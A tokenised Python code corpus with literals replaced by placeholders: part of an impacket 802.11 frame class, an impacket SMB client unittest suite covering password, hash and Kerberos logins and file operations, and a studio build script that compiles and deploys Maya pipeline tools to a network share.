__init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_capabilities ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . 
get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_capabilities ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_listen_interval ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_listen_interval ( self , value ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:2> , value , "<STR_LIT:<>" ) <EOL> def get_current_ap ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:4> : <NUM_LIT:10> ] <EOL> def set_current_ap ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:4> + i , value [ i ] ) <EOL> def get_ssid ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> return self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SSID ) <EOL> def set_ssid ( self , ssid ) : <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SSID , ssid ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> def get_rsn ( self ) : <EOL> "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . 
RSN ) <EOL> if s is None : <EOL> return None <EOL> return s <EOL> def set_rsn ( self , data ) : <EOL> "<STR_LIT>" <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . RSN , data ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementReassociationResponse ( Dot11ManagementAssociationResponse ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> Dot11ManagementAssociationResponse . __init__ ( self , aBuffer ) </s>
<s> import unittest <EOL> import os <EOL> import ConfigParser <EOL> from binascii import unhexlify <EOL> from impacket . smbconnection import SMBConnection , smb <EOL> from impacket . smb3structs import * <EOL> class SMBTests ( unittest . TestCase ) : <EOL> def create_connection ( self ) : <EOL> if self . dialects == smb . SMB_DIALECT : <EOL> s = SMBConnection ( '<STR_LIT>' , self . machine , preferredDialect = self . dialects , manualNegotiate = True ) <EOL> s . negotiateSession ( self . dialects , flags2 = self . flags2 ) <EOL> else : <EOL> s = SMBConnection ( '<STR_LIT>' , self . machine , preferredDialect = self . dialects ) <EOL> return s <EOL> def test_connectTree ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> tid = smb . connectTree ( self . share ) <EOL> UNC = '<STR_LIT>' % ( self . machine , self . share ) <EOL> tid = smb . connectTree ( UNC ) <EOL> def test_connection ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , self . password , self . domain , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None ) ) <EOL> smb . logoff ( ) <EOL> del ( smb ) <EOL> def test_manualNego ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . negotiateSession ( self . dialects ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , self . password , self . domain , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None ) ) <EOL> smb . logoff ( ) <EOL> del ( smb ) <EOL> def test_loginHashes ( self ) : <EOL> lmhash , nthash = self . hashes . split ( '<STR_LIT::>' ) <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , '<STR_LIT>' , self . 
domain , lmhash , nthash ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , '<STR_LIT>' , self . domain , unhexlify ( lmhash ) , unhexlify ( nthash ) , '<STR_LIT>' , None , None ) ) <EOL> smb . logoff ( ) <EOL> def test_loginKerberosHashes ( self ) : <EOL> lmhash , nthash = self . hashes . split ( '<STR_LIT::>' ) <EOL> smb = self . create_connection ( ) <EOL> smb . kerberosLogin ( self . username , '<STR_LIT>' , self . domain , lmhash , nthash , '<STR_LIT>' ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , '<STR_LIT>' , self . domain , unhexlify ( lmhash ) , unhexlify ( nthash ) , '<STR_LIT>' , None , None ) ) <EOL> UNC = '<STR_LIT>' % ( self . machine , self . share ) <EOL> tid = smb . connectTree ( UNC ) <EOL> smb . logoff ( ) <EOL> def test_loginKerberos ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . kerberosLogin ( self . username , self . password , self . domain , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , self . password , self . domain , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None ) ) <EOL> UNC = '<STR_LIT>' % ( self . machine , self . share ) <EOL> tid = smb . connectTree ( UNC ) <EOL> smb . logoff ( ) <EOL> def test_loginKerberosAES ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . kerberosLogin ( self . username , '<STR_LIT>' , self . domain , '<STR_LIT>' , '<STR_LIT>' , self . aesKey ) <EOL> credentials = smb . getCredentials ( ) <EOL> self . assertTrue ( credentials == ( self . username , '<STR_LIT>' , self . domain , '<STR_LIT>' , '<STR_LIT>' , self . aesKey , None , None ) ) <EOL> UNC = '<STR_LIT>' % ( self . machine , self . share ) <EOL> tid = smb . connectTree ( UNC ) <EOL> smb . logoff ( ) <EOL> def test_listPath ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . 
username , self . password , self . domain ) <EOL> smb . listPath ( self . share , '<STR_LIT:*>' ) <EOL> smb . logoff ( ) <EOL> def test_createFile ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> tid = smb . connectTree ( self . share ) <EOL> fid = smb . createFile ( tid , self . file ) <EOL> smb . closeFile ( tid , fid ) <EOL> smb . rename ( self . share , self . file , self . file + '<STR_LIT>' ) <EOL> smb . deleteFile ( self . share , self . file + '<STR_LIT>' ) <EOL> smb . disconnectTree ( tid ) <EOL> smb . logoff ( ) <EOL> def test_readwriteFile ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> tid = smb . connectTree ( self . share ) <EOL> fid = smb . createFile ( tid , self . file ) <EOL> smb . writeFile ( tid , fid , "<STR_LIT:A>" * <NUM_LIT> ) <EOL> finished = False <EOL> data = '<STR_LIT>' <EOL> offset = <NUM_LIT:0> <EOL> remaining = <NUM_LIT> <EOL> while remaining > <NUM_LIT:0> : <EOL> data += smb . readFile ( tid , fid , offset , remaining ) <EOL> remaining = <NUM_LIT> - len ( data ) <EOL> self . assertTrue ( len ( data ) == <NUM_LIT> ) <EOL> self . assertTrue ( data == "<STR_LIT:A>" * <NUM_LIT> ) <EOL> smb . closeFile ( tid , fid ) <EOL> fid = smb . openFile ( tid , self . file ) <EOL> smb . closeFile ( tid , fid ) <EOL> smb . deleteFile ( self . share , self . file ) <EOL> smb . disconnectTree ( tid ) <EOL> smb . logoff ( ) <EOL> def test_createdeleteDirectory ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> smb . createDirectory ( self . share , self . directory ) <EOL> smb . deleteDirectory ( self . share , self . directory ) <EOL> smb . logoff ( ) <EOL> def test_getData ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> smb . 
getDialect ( ) <EOL> smb . getServerName ( ) <EOL> smb . getRemoteHost ( ) <EOL> smb . getServerDomain ( ) <EOL> smb . getServerOS ( ) <EOL> smb . doesSupportNTLMv2 ( ) <EOL> smb . isLoginRequired ( ) <EOL> smb . logoff ( ) <EOL> def test_getServerName ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> serverName = smb . getServerName ( ) <EOL> self . assertTrue ( serverName . upper ( ) == self . serverName . upper ( ) ) <EOL> smb . logoff ( ) <EOL> def test_getServerDNSDomainName ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> serverDomain = smb . getServerDNSDomainName ( ) <EOL> self . assertTrue ( serverDomain . upper ( ) == self . domain . upper ( ) ) <EOL> smb . logoff ( ) <EOL> def test_getServerDomain ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> serverDomain = smb . getServerDomain ( ) <EOL> self . assertTrue ( serverDomain . upper ( ) == self . domain . upper ( ) . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] ) <EOL> smb . logoff ( ) <EOL> def test_getRemoteHost ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> remoteHost = smb . getRemoteHost ( ) <EOL> self . assertTrue ( remoteHost == self . machine ) <EOL> smb . logoff ( ) <EOL> def test_getDialect ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> dialect = smb . getDialect ( ) <EOL> self . assertTrue ( dialect == self . dialects ) <EOL> smb . logoff ( ) <EOL> def test_uploadDownload ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> f = open ( self . upload ) <EOL> smb . putFile ( self . share , self . file , f . read ) <EOL> f . 
close ( ) <EOL> f = open ( self . upload + '<STR_LIT:2>' , '<STR_LIT>' ) <EOL> smb . getFile ( self . share , self . file , f . write ) <EOL> f . close ( ) <EOL> os . unlink ( self . upload + '<STR_LIT:2>' ) <EOL> smb . deleteFile ( self . share , self . file ) <EOL> smb . logoff ( ) <EOL> def test_listShares ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> smb . listShares ( ) <EOL> smb . logoff ( ) <EOL> def test_getSessionKey ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> smb . getSessionKey ( ) <EOL> smb . logoff <EOL> class SMB1Tests ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . flags2 = smb . SMB . FLAGS2_NT_STATUS | smb . SMB . FLAGS2_EXTENDED_SECURITY | smb . SMB . FLAGS2_LONG_NAMES <EOL> self . dialects = smb . SMB_DIALECT <EOL> class SMB1TestsUnicode ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . 
get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . flags2 = smb . SMB . FLAGS2_UNICODE | smb . SMB . FLAGS2_NT_STATUS | smb . SMB . FLAGS2_EXTENDED_SECURITY | smb . SMB . FLAGS2_LONG_NAMES <EOL> self . dialects = smb . SMB_DIALECT <EOL> class SMB002Tests ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . dialects = SMB2_DIALECT_002 <EOL> class SMB21Tests ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . 
get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . dialects = SMB2_DIALECT_21 <EOL> class SMB3Tests ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . dialects = SMB2_DIALECT_30 <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> suite = unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB1Tests ) <EOL> suite . addTests ( unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB1TestsUnicode ) ) <EOL> suite . addTests ( unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB002Tests ) ) <EOL> suite . addTests ( unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB21Tests ) ) <EOL> suite . addTests ( unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB3Tests ) ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:1> ) . run ( suite ) </s>
<s> '''<STR_LIT>''' <EOL> from common . core import globalVariables as gv <EOL> import sys <EOL> if not gv . toolsLocation [ : <NUM_LIT:6> ] == '<STR_LIT>' : <EOL> print "<STR_LIT>" <EOL> sys . exit ( ) <EOL> from common . diagnostic . pcsLogger import logger <EOL> from common . fileIO . pcsPath import Path <EOL> from common . perforce import pcsP4 <EOL> import compileall <EOL> import os <EOL> import shutil <EOL> import xml . etree . ElementTree as ET <EOL> _KEEP_NETWORK_PY = False <EOL> class PipelineBuild ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , remoteBuild = True ) : <EOL> """<STR_LIT>""" <EOL> '''<STR_LIT>''' <EOL> super ( PipelineBuild , self ) . __init__ ( ) <EOL> self . p4 = pcsP4 . P4Lib ( maya = <NUM_LIT:0> ) <EOL> self . networkLoc = gv . toolsLocation <EOL> self . remoteBuild = remoteBuild <EOL> self . buildDest = Path ( gv . toolsLocation ) . parent + '<STR_LIT>' <EOL> def buildPCSPipeline ( self , compileInstaller = False , pyc = True , removePY = True , removePYC = True ) : <EOL> '''<STR_LIT>''' <EOL> completeSuccess = True <EOL> if pyc : <EOL> if not self . createPYCfiles ( self . pipelineSourceLocation ) : <EOL> completeSuccess = False <EOL> if self . remoteBuild : <EOL> if not self . pushToNetwork ( self . buildDest , remote = True ) : <EOL> completeSuccess = False <EOL> if removePY : <EOL> if not _KEEP_NETWORK_PY : <EOL> if not self . removePYfiles ( pathToScrape = self . buildDest ) : <EOL> completeSuccess = False <EOL> for pyFile in Path ( self . buildDest ) . walkfiles ( '<STR_LIT>' ) : <EOL> if "<STR_LIT>" in pyFile or "<STR_LIT>" in pyFile or "<STR_LIT>" in pyFile : <EOL> pyFile . makeWritable ( ) <EOL> pcsStudioXML = Path ( '<STR_LIT>' % self . buildDest ) <EOL> if pcsStudioXML . exists ( ) : <EOL> pcsStudioXML . makeWritable ( _dir = False ) <EOL> self . clean ( self . buildDest ) <EOL> else : <EOL> if not self . pushToNetwork ( self . 
networkLoc , remote = False ) : <EOL> completeSuccess = False <EOL> if removePY : <EOL> if not _KEEP_NETWORK_PY : <EOL> if not self . removePYfiles ( pathToScrape = self . networkLoc ) : <EOL> completeSuccess = False <EOL> if removePYC : <EOL> if not self . removePYfiles ( pathToScrape = self . pipelineSourceLocation , optionalExt = '<STR_LIT>' ) : <EOL> completeSuccess = False <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return completeSuccess <EOL> def clean ( self , pNetworkLoc = '<STR_LIT>' ) : <EOL> _pNetworkLoc = pNetworkLoc <EOL> pymel102 = Path ( '<STR_LIT>' % _pNetworkLoc ) <EOL> if pymel102 . exists ( ) : <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in pymel102 . dirs ( ) : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> if _dir . exists ( ) : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> pymel102 . rmtree ( ) <EOL> pymel103 = Path ( '<STR_LIT>' % _pNetworkLoc ) <EOL> for _dir in pymel103 . dirs ( ) : <EOL> if "<STR_LIT>" not in _dir . basename ( ) and "<STR_LIT>" not in _dir . basename ( ) : <EOL> print "<STR_LIT>" % _dir <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> if _dir . exists ( ) : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> for _file in pymel103 . files ( ) : <EOL> _file . makeWritable ( ) <EOL> _file . remove ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" % _pNetworkLoc ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def compileAPE ( self ) : <EOL> sys . path . append ( r'<STR_LIT>' ) <EOL> for p in sys . 
path : <EOL> logger . debug ( "<STR_LIT>" % p ) <EOL> self . p4 . fileName = '<STR_LIT>' % self . pipelineSourceLocation <EOL> self . p4 . p4CheckOut ( desc = "<STR_LIT>" ) <EOL> os . system ( r'<STR_LIT>' ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def createPYCfiles ( self , pathToScrape = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if not pathToScrape : <EOL> pathToScrape = self . pipelineSourceLocation <EOL> result = compileall . compile_dir ( pathToScrape , force = <NUM_LIT:1> ) <EOL> logger . debug ( "<STR_LIT>" % result ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return True <EOL> @ property <EOL> def pipelineSourceLocation ( self ) : <EOL> '''<STR_LIT>''' <EOL> globalPCSXMLPath = Path ( '<STR_LIT>' % self . networkLoc ) <EOL> globalPCSXML = ET . parse ( globalPCSXMLPath ) <EOL> globalXMLCore = globalPCSXML . getiterator ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> sourceLoc = globalXMLCore . get ( '<STR_LIT>' ) <EOL> return Path ( sourceLoc ) <EOL> def pushToNetwork ( self , networkLoc = gv . toolsLocation , remote = True ) : <EOL> '''<STR_LIT>''' <EOL> _pNetworkLoc = Path ( networkLoc ) <EOL> result = True <EOL> if remote : <EOL> for unused in range ( <NUM_LIT:4> ) : <EOL> if _pNetworkLoc . exists ( ) : <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in _pNetworkLoc . dirs ( ) : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> if '<STR_LIT>' in _dir : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> if _dir . exists ( ) : <EOL> try : <EOL> _dir . 
rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> _pNetworkLoc . rmtree ( ) <EOL> print "<STR_LIT>" % ( self . pipelineSourceLocation , _pNetworkLoc ) <EOL> try : <EOL> Path ( self . pipelineSourceLocation ) . copytree ( _pNetworkLoc ) <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> raise <EOL> except shutil . Error as e : <EOL> print "<STR_LIT>" % e [ <NUM_LIT:0> ] <EOL> if not _pNetworkLoc . exists ( ) : <EOL> logger . error ( "<STR_LIT>" % _pNetworkLoc ) <EOL> for _dir in Path ( '<STR_LIT>' % _pNetworkLoc ) . dirs ( ) : <EOL> if _dir . namebase == '<STR_LIT>' : <EOL> Path ( _dir ) . move ( _pNetworkLoc ) <EOL> else : <EOL> if _pNetworkLoc . exists ( ) : <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in _pNetworkLoc . dirs ( ) : <EOL> if "<STR_LIT:data>" not in _dir : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> if '<STR_LIT>' in _dir : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> if _dir . exists ( ) : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> elif _dir == '<STR_LIT>' : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . rmtree ( ) <EOL> tempNetworkLoc = Path ( '<STR_LIT>' % _pNetworkLoc ) <EOL> print "<STR_LIT>" % ( self . pipelineSourceLocation , tempNetworkLoc ) <EOL> try : <EOL> Path ( self . pipelineSourceLocation ) . copytree ( tempNetworkLoc ) <EOL> except WindowsError : <EOL> print "<STR_LIT>" % tempNetworkLoc <EOL> except shutil . Error as e : <EOL> print "<STR_LIT>" % e [ <NUM_LIT:0> ] <EOL> for _dir in tempNetworkLoc . dirs ( ) : <EOL> try : <EOL> if "<STR_LIT:data>" not in _dir : <EOL> Path ( _dir ) . move ( _pNetworkLoc ) <EOL> except WindowsError : <EOL> print "<STR_LIT>" + _dir <EOL> except shutil . 
Error : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> if tempNetworkLoc . exists ( ) : <EOL> print "<STR_LIT>" % tempNetworkLoc <EOL> for _file in tempNetworkLoc . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % tempNetworkLoc <EOL> tempNetworkLoc . rmtree ( ) <EOL> unNeededRoot = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for unNeeded in unNeededRoot : <EOL> print "<STR_LIT>" % ( _pNetworkLoc , unNeeded ) <EOL> for _dir in Path ( _pNetworkLoc ) . dirs ( ) : <EOL> if _dir . namebase == unNeeded : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in Path ( '<STR_LIT>' % _pNetworkLoc ) . dirs ( ) : <EOL> if _dir . namebase == '<STR_LIT>' : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> pyMelDirs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for pyMelDir in pyMelDirs : <EOL> if not Path ( '<STR_LIT>' % ( _pNetworkLoc , pyMelDir ) ) . exists ( ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> if not _dir . namebase == '<STR_LIT>' and not _dir . namebase == '<STR_LIT>' : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . rmtree ( ) <EOL> for _file in Path ( '<STR_LIT>' % ( _pNetworkLoc , pyMelDir ) ) . files ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _file <EOL> _file . remove ( ) <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in Path ( '<STR_LIT>' % _pNetworkLoc ) . dirs ( ) : <EOL> if not _dir . namebase == '<STR_LIT>' : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . 
